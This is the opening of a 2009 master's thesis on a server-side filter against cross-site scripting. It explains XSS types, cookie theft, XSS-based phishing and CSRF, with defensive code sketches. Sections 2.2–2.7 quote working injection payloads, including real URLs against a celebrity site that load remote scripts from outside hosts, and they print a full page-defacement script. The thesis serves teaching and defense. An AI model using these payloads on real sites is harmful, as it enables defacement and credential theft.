SERVER SIDE API TO SECURE XSS

Thesis

Submitted in partial fulfillment of the requirements for the degree of

MASTER OF TECHNOLOGY in

COMPUTER SCIENCE & ENGINEERING - INFORMATION

SECURITY

by

KAMESH KUMAR BOGANATHAM

(07IS04F)

DEPARTMENT OF COMPUTER ENGINEERING

NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA

SURATHKAL, MANGALORE -575025

July, 2009

NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL

D E C L A R A T I O N

I hereby declare that the Report of the P.G. Project Work entitled “SERVER

SIDE API TO SECURE XSS” which is being submitted to National Institute of

Technology Karnataka Surathkal, for the award of degree of Master of Technology in

Computer Science and Engineering – Information Security in the Department of

Computer Engineering, is a bonafide report of the work carried out by me. The material

contained in this report has not been submitted to any university or Institution for the

award of any degree.

07IS04F, B KAMESH KUMAR

-----------------------------------------------------

(Register Number, Name and Signature of Student)

Department of Computer Engineering

Place: NITK, SURATHKAL Date:

C E R T I F I C A T E

This is to certify that the P.G Project Work Report entitled “SERVER SIDE API TO

SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of

the work carried out by him, is accepted as the P.G Project Work Report Submission in

partial fulfillment of the requirements for the award of degree of Master of Technology in

Computer Science and Engineering – Information Security in the Department of

Computer Engineering, National Institute of Technology Karnataka, Surathkal.

External Guide

(Mr. Radhesh Mohandas )

Adjunct Faculty

Department of Computer Engineering

NITK Surathkal

Internal Guide

( Mr. Alwyn R Pais)

Senior Lecturer

Department of Computer Engineering

NITK Surathkal

Chairman- DPGC

DEDICATED TO

THEIR LORDSHIPS

SRI SRI RADHA VRINDAVANA CHANDRA

ACKNOWLEDGEMENTS

I take this opportunity to express my deepest gratitude and appreciation to all

those who have helped me directly or indirectly towards the successful completion of this

project.

First and foremost, I would like to express my sincere appreciation and gratitude

to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R

Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their

insightful advice, encouragement, guidance, criticism, and valuable suggestions throughout

the course of my project work. Without their continued support and interest, this thesis

would not have been the same as presented here.

I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head,

Department of Computer Engineering, National Institute of Technology Karnataka,

Surathkal for his constant co-operation, support and for providing necessary facilities

throughout the M.Tech program.

I would like to take this opportunity to express my thanks towards the teaching

and non-teaching staff in the Department of Computer Engineering, NITK for their

invaluable help and support in these two years of my study. I am also grateful to all my

classmates for their help, encouragement and invaluable suggestions.

My special thanks to my parents, supporting family and friends who continuously

supported and encouraged me in every possible way for successful completion of this

thesis. I am forever indebted to you all.

B Kamesh Kumar

ABSTRACT

With the Internet becoming ubiquitous in every aspect of our lives, there has been an increase in web applications providing day-to-day services such as banking, shopping, mail, and news updates. Most of these applications, however, have vulnerabilities or security loopholes such as Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and SQL Injection, which hackers exploit for malicious purposes. Hence there is a need for APIs and automated security tools that identify and/or prevent these vulnerabilities before the application goes live.

This work focuses on developing a server-side API for Cross-site Scripting that differentiates an XSS attack from a simple script. Novice users can thus enjoy a safer and better browsing experience without any loss of functionality and without additional software or configuration at the browser side. Such an API also reduces the burden on web administrators of safeguarding their web applications against malicious XSS attacks.

Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery

(CSRF/XSRF), Server-side XSS Filter.

TABLE OF CONTENTS

Title
Declaration
Certificate
Dedication
Acknowledgement
Abstract
Table of contents
List of figures
List of tables
Nomenclature/Acronyms

Chapter I INTRODUCTION
    1.1 Cross-site Scripting Attacks
    1.2 Motivation
    1.3 Organization of Thesis

Chapter II CROSS-SITE SCRIPTING
    2.1 Introduction to Cross-site Scripting
    2.2 A Basic Example
    2.3 Malicious Code
    2.4 Classification of Cross-site Scripting
        2.4.1 Reflected XSS
        2.4.2 Stored XSS
        2.4.3 DOM-based XSS
    2.5 Threats from Cross-site Scripting
    2.6 Cross-site Scripting and Phishing
        2.6.1 Introduction to Phishing
        2.6.2 Phishing Tricks
        2.6.3 Cross-Site Scripting based Phishing Attack
    2.7 Real World Examples
    2.8 XSS Vs. CSRF

Chapter III EXISTING XSS DEFENSES
    3.1 AntiSamy
    3.2 The strip_tags()
    3.3 PHP Input Filter
    3.4 HTML_Safe/SafeHTML
    3.5 Kses
    3.6 htmLawed
    3.7 Safe HTML Checker
    3.8 HTML Purifier
    3.9 Summary

Chapter IV PROBLEM STATEMENT

Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS

Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS
    6.1 Procedure
    6.2 Implementation Details
    6.3 Working of SecureXSS
    6.4 Results

Chapter VII CONCLUSIONS

REFERENCES

APPENDIX I OWASP The Ten Most Critical Web Application Security Vulnerabilities
APPENDIX II Results of SecureXSS API
APPENDIX III Results of HTML Purifier
APPENDIX IV Simple HTML DOM Parser array

Resume (Bio-Data)

LIST OF FIGURES

Fig. No.  Description

2.1  Sample PHP Code for Site Search Engines
2.2  Sample HTTP Response Page Containing the <script> Tag
2.3  Cross-Site Scripting in Site Search Engines
2.4  Sample Malicious Code for Cookie Theft
2.5  An Attack Scenario of Cross-Site Scripting
2.6  Examples of Phishing Tricks
2.7  Cross-Site Scripting based Phishing Attack
2.8  Maria Sharapova’s Home Page
2.9  Defacement
6.1  Server-side XSS Filtering API
6.2  SecureXSS overhead
1    MITRE data on Top 10 web application vulnerabilities for 2006

LIST OF TABLES

Table No.  Description

3.1  Kses API’s
5.1  Tags and its attributes which are in favour of attackers
5.2  Extensions allowed
5.3  DOM Properties which will cause XSS attacks
6.1  SecureXSS timing test (overhead) results
1    OWASP Top 10 Web Application Vulnerabilities
2    Results of SecureXSS
3    Results of HTML Purifier

Nomenclature/Acronyms

Notation Description

XSS Cross-site Scripting

OWASP Open Web Application Security Project

XSRF/CSRF Cross-site Request Forgery

PHP Hypertext Preprocessor

URL Uniform Resource Locator

URI Uniform Resource Identifier

HTML Hyper Text Markup Language

HTTP Hyper Text Transfer Protocol

CHAPTER 1

INTRODUCTION

With the proliferation of the Internet, there has been a surge in web services such as e-banking and e-shopping offered by many corporations. Because most of these applications are not developed with best security practices, malicious attacks against them are increasing. These attacks exploit vulnerabilities in the applications for material gain or to steal the credentials of the novice users who use these web services. This has drawn more research to this domain, with the aim of creating new tools and techniques to thwart such attacks. Many research groups in academia and industry are working on more secure programming practices and on tools that identify vulnerabilities in these applications during development and detect attacks in real time.

The OWASP Top 10 report [OWA] lists the following as the ten most critical web application security vulnerabilities being exploited:

Cross Site Scripting (XSS)

Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc)

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

Information Leakage and Improper Error Handling

Broken Authentication and Session Management

Insecure Cryptographic Storage

Insecure Communications

Failure to Restrict URL Access

In this work, we focus on Cross-site Scripting (XSS), which allows an attacker to insert malicious script into a web application and thereby harm legitimate users. In the process, we developed a server-side XSS filtering API that differentiates a potential XSS attack from a simple script and strips it out. The main goal of this work is to give web administrators an XSS solution that safeguards their applications from attackers, so that ordinary users get a safer and better browsing experience without any loss of functionality.

1.1 Cross-site Scripting Attacks

The cross-site scripting attack method was first discussed in a CERT advisory in 2000 [CER]. Even today, cross-site scripting (XSS) is one of the most common vulnerabilities in web applications. It results from insufficient filtering of data that is received from a malicious person and then sent to third parties. Systems that receive data from users and display it in other users' browsers are highly vulnerable to XSS attacks. Wikis, forums, chats, and web mail are all good examples of the applications most susceptible to XSS.

Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts malicious code into a page returned by a web server that the user trusts. This code may reside on the web server or be explicitly inserted when the user browses to the particular web site; it may contain JavaScript or just HTML; and it may use third-party sites as sources or rely only upon the resources of the targeted server. XSS attacks typically involve JavaScript code from a malicious web server executing in a user's web browser. Chapter 2 gives a brief overview of XSS attacks and their types, with examples and illustrations.

1.2 Motivation

In recent years, dynamic Web applications such as online banking systems and online shops have become more and more popular. At the same time, security attacks that exploit Web application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site Scripting is the most common security issue (as noted above, it is the topmost vulnerability in the OWASP 2007 report); it enables attackers to steal credentials from a victim, gather sensitive information, or make a Web site unavailable. To mitigate such serious impact, Web applications should use an effective solution for Cross-Site Scripting flaws. Manual security testing is, however, both expensive and error-prone because of the increasing complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws are essential.

We have investigated some available solutions that claim to be state of the art. Unfortunately, most of them are not effective because they fail to differentiate simple scripts from potential XSS attacks. Therefore, we have developed SecureXSS (pronounced "Secure Excess"), an open-source server-side filter for detecting and filtering Cross-Site Scripting vulnerabilities in Web applications.

1.3 Organization of Thesis

The rest of the thesis is organized as follows. Chapter 2 gives brief information about XSS attacks and their types, with live examples and illustrations. Chapter 3 deals with the available solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our solution for mitigating XSS, called SecureXSS: Server-side XSS Filter. Chapter 6 gives the implementation details and experimental results, and Chapter 7 concludes the thesis and outlines future work, followed by the references. Appendix I details the Top 10 most critical web application vulnerabilities. Appendix II shows the results of the SecureXSS API, Appendix III shows the results of HTML Purifier, and Appendix IV shows the Simple HTML DOM Parser array.

CHAPTER 2

CROSS-SITE SCRIPTING

Cross-Site Scripting vulnerabilities are widespread. A look at the Bugtraq mailing list shows that postings reporting Cross-Site Scripting holes appear regularly. As mentioned in the introduction, Cross-Site Scripting vulnerabilities are the most common security loopholes, found in over 80 percent of Web sites. Hence, the likelihood that a Web site is vulnerable to XSS is extremely high. According to the Information-Technology Promotion Agency (IPA), from July 2004 to September 2005 attacks using Cross-Site Scripting were the most serious issue among all Web application attacks, accounting for 42%, while SQL Injection ranked second with 16%. Thus, it is imperative to make Web applications secure against XSS attacks.

In this chapter, we start by briefly explaining the XSS problem with a basic example, and then give an introduction to malicious code and how XSS attacks work. After presenting the classification of XSS, we describe the risks that XSS may cause.

2.1 Introduction to Cross-site Scripting

As introduced in the previous chapter, Web applications are becoming not only increasingly popular but also more and more vulnerable. Attack techniques that exploit various types of Web application vulnerabilities are becoming more sophisticated. One class of these techniques is referred to as Cross-Site Scripting (or HTML Code Injection); it takes advantage of Web applications that fail to validate user input before displaying it back to the user. Such attacks commonly involve three parties: the user (victim), the attacker, and the XSS-vulnerable website. The attacker uses the poorly designed legitimate website as a vehicle to execute malicious code in the user’s browser, where it runs as if it originated from a trusted source.

As explained above, XSS attacks occur when an attacker uses a web application to send malicious code (generally in the form of a browser-side script) to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted and will execute it. Because the browser thinks the script came from a trusted source, the malicious script can access cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page [XSS].

2.2 A Basic Example

Most web applications contain a site search engine. Such search engines usually display the results on the screen together with the search phrase entered by the user. As an example, consider the PHP code shown in Figure 2.1, in which the text after “Search results for” is generated dynamically from the user input. When the search phrase (user input) is not sanitized properly, Cross-Site Scripting becomes possible and can be used for an attack. As illustrated in Figure 2.3 (a), after clicking the search button we get the search phrase entered in the form field (here, search text) displayed in the response page, regardless of the search results. We now experiment with HTML tags. As illustrated in Figure 2.3 (b), the search phrase returned (here, Hello World) is formatted as bold instead of being displayed as the text we entered (Hello World enclosed in an HTML bold tag). Besides displaying a formatted search phrase, we can also cause JavaScript code to be executed in the browser (most browsers enable JavaScript by default). As illustrated in Figure 2.3 (c), instead of showing the search phrase, a JavaScript alert box with the text XSS Vulnerability pops up. This happens because the browser interprets the search phrase we entered as an HTML tag instead of text. In the sample HTTP response page shown in Figure 2.2, the <script> tag introduces a JavaScript program and thus is not displayed by the browser.
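The three searches of Figure 2.3 can be reproduced with a small sketch. The thesis example is written in PHP; the JavaScript below is only an illustration of the same idea, and the names escapeHtml, renderVulnerable and renderEscaped are hypothetical helpers, not part of SecureXSS or of any library.

```javascript
// Illustrative sketch only: all function names here are hypothetical.

// Replace the characters that are significant in HTML with entities.
function escapeHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Mimics the vulnerable search page: the phrase is echoed back unchanged.
function renderVulnerable(phrase) {
  return 'Search results for ' + phrase;
}

// Same page, but the phrase is encoded before it is written to the response.
function renderEscaped(phrase) {
  return 'Search results for ' + escapeHtml(phrase);
}

// The three inputs correspond to cases (a), (b) and (c) of Figure 2.3.
const inputs = [
  'search text',
  '<b>Hello World</b>',
  '<script>alert("XSS Vulnerability")</script>',
];
for (const phrase of inputs) {
  console.log(renderVulnerable(phrase));
  console.log(renderEscaped(phrase));
}
```

With the encoded variant the browser would show the markup as literal text, so neither the bold formatting nor the alert box appears. Blanket encoding also removes harmless formatting, which is the trade-off a filter that tells simple scripts apart from attacks tries to avoid.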

2.3 Malicious Code

Considering the example above, one may ask: it just throws up an alert box, so how dangerous can it be? Indeed, alert pop-ups are annoying, but they do not really cause security issues. We use them only to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert function can be executed, there is generally no reason why other JavaScript functions containing malicious code cannot succeed.

Figure 2.1: Sample PHP Code for Site Search Engines

Figure 2.2: Sample HTTP Response Page Containing the <script> Tag

(a) Search for a Simple Text

(b) Search for a Formatted Text

(c) Search for an Executable Script

Figure 2.3: Cross-Site Scripting in Site Search Engines

Attackers exploit XSS vulnerabilities in order to execute injected malicious code. What does malicious code mean, and what impact can it have? Next, we give an introduction to malicious code.

By default, most Web browsers are able to run scripts embedded in Web pages downloaded from a Web server. Such scripts are usually written in scripting languages such as JavaScript and VBScript and are introduced by the HTML scripting tag <script>. In addition to the scripting tag, many other HTML tags can be misused to load malicious code.

Malicious code is able to rewrite an HTML page with fraudulent content or redirect the client’s browser to the attacker’s page; it can even access authentication cookies, session management tokens, or other sensitive information. With this information, an attacker is able to hijack the victim’s active session and thus bypass the authentication process completely.

Consider the script in Figure 2.4. When this script is successfully injected into a page of a site (e.g. www.xss.site) and a victim’s browser loads this page, the embedded script is executed and captures the victim’s cookie for this site. The attacker is now able to access the victim’s account and masquerade as the victim (Figure 2.5 illustrates this scenario).

Figure 2.4: Sample Malicious Code for Cookie Theft

Figure 2.5: An Attack Scenario of Cross-Site Scripting

The steps shown in Figure 2.5 are explained below in detail.

(1) A user logs in to an XSS-vulnerable site.

(2) The site sets a cookie (e.g. ID=123) for the user, which is saved in the browser.

(3) An attacker knows that the site displays a parameter without validation (e.g. the parameter “name”); he constructs a link containing the malicious code described in Figure 2.4 and tricks the user into clicking on this link.

(4) The unsuspecting user clicks on the link, and an HTTP request containing the attacker’s malicious code is sent to the XSS-vulnerable site.

(5) In response to the request, the site generates a response page with the malicious code embedded and returns this page to the user.

(6) While the user views the response page, the malicious code is executed in the user’s browser, and the cookies of that web site are sent to the attacker.

(7) The attacker now has access to the user’s account and can masquerade as the user.

The possible sources of malicious code include the URL query string, HTML form fields, HTTP headers, and cookies. Since malicious code is embedded in websites the user trusts, it is allowed to perform dangerous operations unhindered. Websites using SSL are no better protected against malicious code than other websites. SSL only encrypts the data (including the malicious code) transmitted over the connection; it does not attempt to validate the data. Therefore, XSS attacks can be carried out as usual, except that they occur over an encrypted connection.

2.4 Classification of Cross-site Scripting

Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected (non-persistent), Stored (persistent), and DOM-based. Before describing these categories, we introduce the DOM, which is needed to understand the third type of XSS.

The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML, and XML documents. Objects under the DOM (sometimes also called "elements") may be specified and addressed according to the syntax and rules of the programming language used to manipulate them. In simple terms, the Document Object Model is the way JavaScript sees its containing HTML page and browser state. We now describe the three categories in turn.

2.4.1 Reflected XSS

Reflected XSS (also referred to as non-persistent XSS) is by far the most common type. It means that, after a request, the page containing the malicious code is returned to the Web browser immediately.

Normally, a non-persistent XSS attack requires deceiving a user, by means of social engineering techniques, into visiting a specially crafted URL with embedded malicious code. When the user is tricked into clicking on the malicious link, the code embedded in the URL is executed in the Web browser, and the attack succeeds.

2.4.2 Stored XSS

In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) means that malicious code injected into a website is stored (in a database or XML files) for a longer period and displayed to users in a web page later. This kind of XSS is more serious than the other types because an attacker can inject malicious code just once and affect a large number of unsuspecting users; the attacker hardly even needs to trick users into clicking on a link containing malicious code. For example, if the malicious code is stored in a database, an innocent user may become a victim just by viewing the page that contains the stored code, without clicking on any link.

There is another kind of stored XSS that manipulates the user’s cookies. With such techniques, attackers are able to tamper with the cookie content by adding malicious code, causing the code to be executed each time the user visits the website.

Web applications that are especially vulnerable to stored XSS include discussion forums, guest books, and webmail systems. RSS feeds, which are popular in web blogs and news sites, can also be used as a vehicle for such attacks.

Here is a real-world example of a persistent XSS attack that occurred on the popular online auction website eBay. As reported by US-CERT in April 2006, when an eBay user posts an auction, <script> tags are allowed in the auction description, which creates an XSS vulnerability in the eBay Web site. Attackers exploited this vulnerability to redirect auction viewers to a fake eBay login page that requests login information in order to steal credentials [USC].
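The "inject once, affect every viewer" property of stored XSS can be sketched with an in-memory guest book. Everything in this example is hypothetical (the GuestBook class, the escapeHtml helper, and the attacker.example host); it is a minimal illustration that assumes output encoding as the defense, not a description of how eBay or SecureXSS handles stored content.

```javascript
// Hypothetical in-memory guest book, used only to illustrate stored XSS.

function escapeHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

class GuestBook {
  constructor() {
    this.entries = [];
  }

  // The entry is stored exactly as submitted, including any markup.
  post(author, message) {
    this.entries.push({ author, message });
  }

  // Every viewer receives every stored entry; encoding happens at output time.
  renderFor(viewer) {
    const items = this.entries.map(
      (e) => '<li>' + escapeHtml(e.author) + ': ' + escapeHtml(e.message) + '</li>'
    );
    return '<p>Hello ' + escapeHtml(viewer) + '</p><ul>' + items.join('') + '</ul>';
  }
}

const book = new GuestBook();
// A single malicious post (attacker.example is a placeholder host).
book.post('mallory', '<script>document.location="http://attacker.example/"</script>');
book.post('alice', 'Nice site!');

// The same stored entry is served to each later visitor.
for (const viewer of ['bob', 'carol']) {
  console.log(book.renderFor(viewer));
}
```

Without the escapeHtml calls in renderFor, the single post by mallory would run in the browser of every visitor who opens the page, with no link to click.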

2.4.3 DOM – based XSS

Besides the XSS attacks described above, which are considered standard XSS, there is a third kind of XSS attack, namely DOM-based XSS. Unlike the standard XSS attacks, which rely on dynamic web pages, a DOM-based XSS attack does not necessarily require sending malicious code to the server and can therefore also exploit static HTML pages.

The problem lies in the client-side script (i.e. JavaScript) within the page itself, which retrieves data from certain DOM objects without encoding the URL characters. The DOM objects in question include:

- document.location
- document.URL
- document.referrer

We make this clear by means of a simple example. Assume that the following script resides within an HTML page; it writes the text retrieved from the current URL somewhere in the page.

document.write(document.URL);

When we enter the following URL into the address bar of a browser, we get an alert box with the text “XSS”, which demonstrates an XSS hole.

http://www.xss.site/index.html#<script>alert("XSS")</script>
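A short sketch can show why a server-side check never sees a payload of this kind: everything after the # character is a URL fragment, which the browser keeps to itself. The example uses the standard URL class available in browsers and Node.js; writing the payload with explicit script tags is an assumption about what the attack URL carries.

```javascript
// Sketch: the fragment (the part after '#') is never sent to the server.
const url = new URL('http://www.xss.site/index.html#<script>alert("XSS")</script>');

// What the server sees in the request line: path and query only.
const requestTarget = url.pathname + url.search;

// What client-side script can still read from the URL: the fragment too.
// The URL class may percent-encode some characters, so decode before use.
const fragment = decodeURIComponent(url.hash.slice(1));

console.log(requestTarget);
console.log(fragment);
```

Because the payload is only visible on the client, the page's own script has to treat URL-derived values as text, for example by assigning them to an element's textContent property instead of passing them to document.write.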

2.5 Threats from Cross-site Scripting

Some of the common threats from XSS attacks are listed below:

Cookie theft and account hijacking: one of the most severe XSS attacks involves cookie theft and account hijacking, as in the scenario illustrated in Figure 2.5. Credentials stored in cookies can be stolen by attackers, which makes it possible for them to assume the user’s identity and access his confidential information. For normal users, this means that personal data such as credit card or bank account information may be misused. For users with high privileges such as administrators, a stolen account gives attackers access to the web server and the backend database system, and thus full control of the web application.

Misinformation: another critical threat from XSS is the danger of credentialed misinformation. XSS attacks may include malicious code that spies on the user’s surfing behavior and gathers statistics (e.g. by logging the user’s clicks or the history of sites visited), which results in loss of privacy. Another kind of misinformation arises because malicious code, once executed in a browser, is able to modify the presentation of page content. This enables an attacker to manipulate a press release or important news, or even to influence the stock price of a company, which results in loss of integrity. A malicious script may also modify the login page; combined with Phishing, this can lead a victim to submit his login information to the attacker unknowingly.

Denial of Service: from the point of view of an enterprise, it is imperative that its Web applications be accessible all the time. However, a malicious script can lead to loss of availability, for example by redirecting users’ browsers to other websites. The spread of the XSS worm on Myspace.com is another example of a Denial of Service attack. From the point of view of users, a malicious script can also make the browser crash or become inoperable (e.g. by throwing an endless series of alert boxes), so that the user cannot reach the Web application any more.

Browser exploitation: a malicious script can redirect client browsers to an attacker’s site, so that the attacker is able to take advantage of a specific security hole in the web browser to control the user’s computer by executing arbitrary commands, for example to install Trojan horse programs on the client or to upload local data containing sensitive information.

2.6 Cross-site Scripting and Phishing

This part of the thesis briefly explains phishing based on cross-site scripting. Section 2.6.1 introduces phishing, Section 2.6.2 explains some phishing tricks, and Section 2.6.3 explains cross-site scripting based phishing attacks.

2.6.1 Introduction to Phishing

Phishing (as in fishing for sensitive data) is the act of using social engineering techniques to trick someone into giving up sensitive information such as credit card numbers, passwords, bank account information, or other personal data [STA, OLL].

Phishing usually uses email as its medium: messages that appear to come from a bank ask users to log into their online banking system, change their password, or enter their credit card number. In recent years, Phishing has become a major issue. According to the Pew Study [PEW], by October 2005 more than a third of email users had been targeted by Phishing, and two percent had responded by providing personal financial information.

(a) Similar or Misspelled Domain Names

(b) URL Hex Encoding

(c) Using HTML Coding to Hide the Real Link

Figure 2.6: Examples of Phishing Tricks

2.6.2 Phishing Tricks

Tricks commonly used for Phishing include:

Similar or misspelled domain names (see Figure 2.6(a)). Phishers may also substitute the uppercase “I” for the lowercase “L”, because the two are hard for users to distinguish.

Using an encoded URL. The URL is encoded with Hex, Unicode, or UTF-8 encoding to disguise its true value. An example of Hex encoding is illustrated in Figure 2.6(b).

Using HTML coding to hide the real link (see Figure 2.6(c)). The real link is not directly visible to the user. As soon as he clicks the link, he is taken to the attacker’s fake site instead of the site indicated.

Using fake banner advertising. Phishers can copy banner advertising and publish it on the Internet. As in the example above, the banner is linked to the fake site, and the destination is not directly visible to users.
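Some of the tricks listed above can be made visible with a few lines of code. The sketch below is a hypothetical illustration, not a complete phishing detector: hostOf, linkIsDeceptive and decodeForDisplay are invented helper names, and the host names are placeholders under the reserved .example domain (plus a deliberately misspelled example.com).

```javascript
// Hypothetical helpers for illustration; none of these names come from a library.

// Returns the lowercased host of an absolute URL, or null if it is not one.
function hostOf(urlText) {
  try {
    return new URL(urlText).hostname.toLowerCase();
  } catch (err) {
    return null;
  }
}

// Trick (c): the visible link text names one host, the href points to another.
function linkIsDeceptive(displayText, href) {
  const shown = hostOf(displayText.trim());
  const actual = hostOf(href);
  // Only judge links whose visible text itself looks like a URL.
  if (shown === null || actual === null) return false;
  return shown !== actual;
}

// Trick (b): hex (percent) encoding decodes back to ordinary characters.
function decodeForDisplay(urlText) {
  try {
    return decodeURIComponent(urlText);
  } catch (err) {
    return urlText; // malformed escape sequence: show the text unchanged
  }
}

console.log(linkIsDeceptive('http://www.bank.example/', 'http://phish.example/'));
console.log(decodeForDisplay('http://www.bank.example/%6C%6F%67%69%6E'));
// Trick (a): an uppercase "I" standing in for "l" shows up once lowercased.
console.log(hostOf('http://www.exampIe.com/'));
```

Normalizing a URL before showing it to the user exposes the hex-encoded path and the swapped letter; the host comparison covers only links whose visible text is itself a URL.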

2.6.3 Cross-Site Scripting based Phishing Attack

The Phishing tricks described above misdirect users to fake sites. If, however, the Phishing content is served from the real site, the attack is more dangerous, since users trust the real site. Such attacks become possible when a site is vulnerable to XSS. The example below demonstrates such an attack.

A Cross-site Scripting based Phishing attack involves the following steps:

1. Finding Cross-site Scripting vulnerabilities in a site.

2. Embedding malicious content into a fraudulent email. The attacker could use an encoded URL to obfuscate the true destination.

3. Sending the spoofed email to victims.

When a user clicks the link in the spoofed email, the login part of the returned page is replaced with the fake login form from the attacker’s site, while the other contents of the page and the address bar remain unchanged. The user is not aware of this and logs in with his personal information, which is sent to the attacker. After login, the user is redirected back to the real site. Figure 2.7 illustrates this scenario.

XSS-based Phishing attacks can bypass traditional Phishing defenses such as blacklists and SSL notices. The first step in an XSS-based Phishing attack is to find XSS vulnerabilities in an insecure Web site.

2.7 Real World Examples

On April 1, 2007, there was an interesting prank on the home page of Maria Sharapova, the famous tennis player (Figure 2.8). Apparently someone had identified an XSS vulnerability and used it to inform Maria’s fan club that she was quitting her career in tennis to become a Cisco CCIE Security Expert.

The URL that triggers the XSS issue looks like the following:

http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/script%3E%3C!--&pagenumber=1

Figure 2.7: Cross-Site Scripting based Phishing Attack

Notice that the actual XSS vulnerability affects the page GET parameter, which is also URL-encoded. In its decoded form, the value of the page parameter looks like this:

// --></script><script src=http://www.securitylab.ru/upload/story.js></script><!--

The first part of the payload (// -->) comments out everything generated by the page up until that point. The second part of the payload includes a remote script hosted at www.securitylab.ru. Finally, the last few characters of the payload make the rest of the page disappear.
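The decoding step described above can be checked mechanically. The following sketch feeds the attack URL quoted earlier to the standard URL and URLSearchParams interfaces, which percent-decode each parameter value when it is read; the variable names are chosen for this illustration only.

```javascript
// The attack URL from the text, split across lines only for readability.
const attackUrl =
  'http://www.mariasharapova.com/defaultflash.sps?page=//%20--' +
  '%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js' +
  '%3E%3C/script%3E%3C!--&pagenumber=1';

// searchParams splits the query string and percent-decodes each value.
const params = new URL(attackUrl).searchParams;
const page = params.get('page');
const pageNumber = params.get('pagenumber');

console.log(page);
console.log(pageNumber);
```

Reading the parameter this way makes the three parts of the payload visible: the closing of the page's own script block, the remote script include, and the trailing comment opener.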

Figure 2.8: Maria Sharapova’s Home Page

The script hosted at SecurityLab has the following content:

document.write("Maria Sharapova");
document.write("Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE.");
document.write("Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers down.");

Let’s have a look at the following example provided by RSnake from ha.ckers.org.

RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS

defacement on every page where it is included. The script is defined like this:

var title = "XSS Defacement";
var bgcolor = "#000000";
var image_url = "http://ha.ckers.org/images/stallowned.jpg";
var text = "This page has been Hacked!";
var font_color = "#FF0000";

deface(title, bgcolor, image_url, text, font_color);

function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
    document.title = pageTitle;
    document.body.innerHTML = '';
    document.bgColor = bgColor;
    var overLay = document.createElement("div");
    overLay.style.textAlign = 'center';
    document.body.appendChild(overLay);
    var txt = document.createElement("p");
    txt.style.font = 'normal normal bold 36px Verdana';
    txt.style.color = fontColor;
    txt.innerHTML = pageText;
    overLay.appendChild(txt);
    if (image_url != "") {
        var newImg = document.createElement("img");
        newImg.setAttribute("border", '0');
        newImg.setAttribute("src", imageUrl);
        overLay.appendChild(newImg);
    }
    var footer = document.createElement("p");
    footer.style.font = 'italic normal normal 12px Arial';
    footer.style.color = '#DDDDDD';
    footer.innerHTML = title;
    overLay.appendChild(footer);
}

In order to use the script we need to include it the same way we did when defacing Maria

Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:

http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E%3C!--&pagenumber=1

The result of the defacement is shown in Figure 2.9. Website defacement, XSS based or

not, is an effective mechanism for manipulating the masses and establishing political and non-

political points of view. Attackers can easily forge news items, reports, and important data by

using any of the XSS attacks. It takes only a few people to believe what they see in order to turn

something fake into something real.

The examples explained here are taken from [JEG]; refer to it for many more real-world XSS attacks and examples.

Figure 2.9 Defacement

2.8 XSS Vs. CSRF

Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently

confused as they are clearly related [RRO]. Both attacks are aimed at the user and often require

the victim to access a malicious web page. Also the potential consequences of the two attack

vectors can be similar: The attacker is able to submit certain actions to the vulnerable web

application using the victim's identity. The causes of the two attack classes are different though.

A web application that is vulnerable to XSS fails to properly sanitize user provided data before

including this data on a webpage, thus allowing an attacker to include malicious JavaScript in the

web application. This JavaScript consequently is executed by the victim's browser and initiates

the malicious requests. XSS attacks have capabilities beyond the creation of HTTP requests

and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited

power over the webpage it is embedded in and is able to communicate with the attacker. As an

example, XSS can obtain and leak sensitive information.

Cross-Site Scripting (XSS) exploits the trust that a client has in the website or application. Users generally trust that the content displayed in their browsers is the content that the website being viewed intended to display. In contrast, CSRF exploits the trust that a site has in the user: when an 'action request' is performed, the website assumes that the request was sent by the user [ROB].

